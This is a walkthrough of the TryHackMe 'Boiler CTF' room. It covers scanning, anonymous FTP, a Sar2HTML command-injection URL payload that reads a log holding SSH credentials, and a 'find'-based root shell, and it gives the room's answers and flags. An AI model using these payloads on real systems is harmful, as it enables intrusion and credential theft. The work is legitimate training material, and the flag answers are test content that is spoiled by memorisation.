In this walk through, we will be going through the Boiler CTF room from Tryhackme. It is a medium rated box on the platforms and demands skills in enumeration, finding public exploits and how to leverage the basics privilege escalation vectors. Beware of the trolls and rabbit hole the box gives you. On that basis, let’s get started.
Machine Info:
Title | BoilCTF |
IPaddress | 10.10.217.53 |
Difficulty | Medium |
Objective | Intermediate level CTF. Just enumerate, you’ll get there. |
Phase 1 – Enumeration
- First checking if machine is live or not.
- Started with a regular nmap scan along with a full port scan to discover unusual ports. Found – 21 (FTP), 22 (SSH), 10000 (Webmin) and 55007 (another SSH)
wh1terose@fsociety:~$ sudo nmap -sS -sV 10.10.217.53 [sudo] password for wh1terose: Starting Nmap 7.80 ( https://nmap.org ) at 2023-05-13 22:16 IST sendto in send_ip_packet_sd: sendto(5, packet, 44, 0, 10.10.217.53, 16) => Operation not permitted Offending packet: TCP 10.18.11.103:57872 > 10.10.217.53:53 S ttl=37 id=21610 iplen=44 seq=2684070567 win=1024 <mss 1460> sendto in send_ip_packet_sd: sendto(5, packet, 44, 0, 10.10.217.53, 16) => Operation not permitted Offending packet: TCP 10.18.11.103:57873 > 10.10.217.53:53 S ttl=58 id=53905 iplen=44 seq=2684005030 win=1024 <mss 1460> sendto in send_ip_packet_sd: sendto(5, packet, 44, 0, 10.10.217.53, 16) => Operation not permitted Offending packet: TCP 10.18.11.103:57874 > 10.10.217.53:53 S ttl=53 id=18665 iplen=44 seq=2683939493 win=1024 <mss 1460> sendto in send_ip_packet_sd: sendto(5, packet, 44, 0, 10.10.217.53, 16) => Operation not permitted Offending packet: TCP 10.18.11.103:57875 > 10.10.217.53:53 S ttl=57 id=63427 iplen=44 seq=2683873956 win=1024 <mss 1460> Nmap scan report for 10.10.217.53 Host is up (0.22s latency). Not shown: 996 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 53/tcp filtered domain 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) 10000/tcp open http MiniServ 1.930 (Webmin httpd) Service Info: OS: Unix Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 57.13 seconds
- Found a hidden txt file in FTP server which we accessed through anonymous login.
wh1terose@fsociety:~/CTF/TryHackme/Boiler CTF$ ftp 10.10.217.53 Connected to 10.10.217.53. 220 (vsFTPd 3.0.3) Name (10.10.217.53:wh1terose): anonymous 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> ftp> ls -al 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. drwxr-xr-x 2 ftp ftp 4096 Aug 22 2019 . drwxr-xr-x 2 ftp ftp 4096 Aug 22 2019 .. -rw-r--r-- 1 ftp ftp 74 Aug 21 2019 .info.txt 226 Directory send OK. ftp> get .info.txt local: .info.txt remote: .info.txt 200 PORT command successful. Consider using PASV. 150 Opening BINARY mode data connection for .info.txt (74 bytes). 226 Transfer complete. 74 bytes received in 0.00 secs (115.2562 kB/s) ftp> exit ca221 Goodbye. wh1terose@fsociety:~/CTF/TryHackme/Boiler CTF$ cat .info.txt Whfg jnagrq gb frr vs lbh svaq vg. Yby. Erzrzore: Rahzrengvba vf gur xrl! wh1terose@fsociety:~/CTF/TryHackme/Boiler CTF$
- Lots of trolls on the machine.
- Webmin exploit failed.
- Fired up gobuster on webserver at port 80, found a joomla installation.
wh1terose@fsociety:~$ gobuster dir -u http://10.10.217.53/ -w ~/Desktop/Wordlist/common.txt =============================================================== Gobuster v3.1.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://10.10.217.53/ [+] Method: GET [+] Threads: 10 [+] Wordlist: /home/wh1terose/Desktop/Wordlist/common.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.1.0 [+] Timeout: 10s =============================================================== 2023/05/13 22:20:10 Starting gobuster in directory enumeration mode =============================================================== /.hta (Status: 403) [Size: 291] /.htpasswd (Status: 403) [Size: 296] /.htaccess (Status: 403) [Size: 296] /index.html (Status: 200) [Size: 11321] /joomla (Status: 301) [Size: 313] [--> http://10.10.217.53/joomla/] /manual (Status: 301) [Size: 313] [--> http://10.10.217.53/manual/] /robots.txt (Status: 200) [Size: 257] /server-status (Status: 403) [Size: 300]
- Lots of rabbit hole.
- Firing up gobuster on joomla endpoint. Found potential directories like – _test
wh1terose@fsociety:~$ gobuster dir -u http://10.10.217.53/joomla/ -w ~/Desktop/Wordlist/common.txt =============================================================== Gobuster v3.1.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://10.10.217.53/joomla/ [+] Method: GET [+] Threads: 10 [+] Wordlist: /home/wh1terose/Desktop/Wordlist/common.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.1.0 [+] Timeout: 10s =============================================================== 2023/05/13 22:25:36 Starting gobuster in directory enumeration mode =============================================================== /.hta (Status: 403) [Size: 298] /.htaccess (Status: 403) [Size: 303] /.htpasswd (Status: 403) [Size: 303] /_archive (Status: 301) [Size: 322] [--> http://10.10.217.53/joomla/_archive/] /_database (Status: 301) [Size: 323] [--> http://10.10.217.53/joomla/_database/] /_files (Status: 301) [Size: 320] [--> http://10.10.217.53/joomla/_files/] Progress: 380 / 4656 (8.16%) Progress: 400 / 4656 (8.59%) /_test (Status: 301) [Size: 319] [--> http://10.10.217.53/joomla/_test/]
http://10.10.217.53/joomla/_test/index.php
- Found an RCE in Sar2HTML which we can be exploit using command execution.
- Viewing the log file using the payload.
http://10.10.217.53/joomla/_test/index.php?plot=;cat log.txt
- Found a SSH log entry showcasing an SSH login attempt. We got the user credentials.
Creds Found: Username: basterd Password: superduperp@$$
Phase 2 – Exploitation
- Got our first entry via SSH on unusual SSH port – 55007 with the credentials of user “basterd”
$ cat backup.sh REMOTE=1.2.3.4 SOURCE=/home/stoner TARGET=/usr/local/backup LOG=/home/stoner/bck.log DATE=`date +%y\.%m\.%d\.` USER=stoner #superduperp@$$no1knows ssh $USER@$REMOTE mkdir $TARGET/$DATE if [ -d "$SOURCE" ]; then for i in `ls $SOURCE | grep 'data'`;do echo "Begining copy of" $i >> $LOG scp $SOURCE/$i $USER@$REMOTE:$TARGET/$DATE echo $i "completed" >> $LOG if [ -n `ssh $USER@$REMOTE ls $TARGET/$DATE/$i 2>/dev/null` ];then rm $SOURCE/$i echo $i "removed" >> $LOG echo "####################" >> $LOG else echo "Copy not complete" >> $LOG exit 0 fi done else echo "Directory is not present" >> $LOG exit 0 fi $ su stoner Password: stoner@Vulnerable:/home/basterd$ cd .. stoner@Vulnerable:/home$ cd stoner/ stoner@Vulnerable:~$ ls stoner@Vulnerable:~$ ls -al total 16 drwxr-x--- 3 stoner stoner 4096 Aug 22 2019 . drwxr-xr-x 4 root root 4096 Aug 22 2019 .. drwxrwxr-x 2 stoner stoner 4096 Aug 22 2019 .nano -rw-r--r-- 1 stoner stoner 34 Aug 21 2019 .secret stoner@Vulnerable:~$ cat .secret You made it till here, well done. stoner@Vulnerable:~$
- Got the user “stoner” user password in backup.sh
- Got our user flag in .secret (hidden) file.
- Another troll, move on with it.
Phase 3 – Privilege Escalation
- Started with a normal scan with linpeas to discover potential priv esc vectors. Found the “find” binary (how funny) which we can run as root.
- Used GTFObins payload to get the root shell and finally got the root flag.
stoner@Vulnerable:/$ find . -exec /bin/bash -p \; bash-4.3# whoami root bash-4.3# cd /root bash-4.3# ls root.txt bash-4.3# cat root.txt It wasn't that hard, was it?
Task 1 – Questions #1
Question 1 – File extension after anon login
txt
Question 2 – What is on the highest port?
SSH
Question 3 – What’s running on port 10000?
webmin
Question 4 – Can you exploit the service running on that port? (yay/nay answer)
nay
Question 5 – What’s CMS can you access?
joomla
Question 6 – Keep enumerating, you’ll know when you find it.
Done
Question 7 – The interesting file name in the folder?
log.txt
Task 2 – Questions #2
Question 1 – Where was the other users pass stored(no extension, just the name)?
Done
Question 2 – user.txt
You made it till here, well done.c
Question 3 – What did you exploit to get the privileged user?
find
Question 4 – root.txt
It wasn't that hard, was it?
Also Read: Tryhackme – Blue
Conclusion:
So, that was it. Trust me, this room “Boiler CTF” has a lot of rabbit holes and trolls lying around. You might waste some of your time and energy by going after them. However, if enumeration done properly, you can uncover the real path to the kingdom. So, let’s summarize it quickly. First, we started with a full nmap scan which gives us five ports opened – 21,22,80, 10000, 55007. Out of which, the port “55007” was unusual as it was running another SSH service. Further, we tried to exploit the webmin service on port 10000 however it got failed. Next, we used gobuster to reveal some hidden directory. Found a directory called “_test” which has a Sar2HTML functionality in it. We further exploit a RCE vulnerability in the Sar2HTML implementation and got the SSH credentials for the initial access. For privilege escalation, we exploited the “find” binary and got the root shell.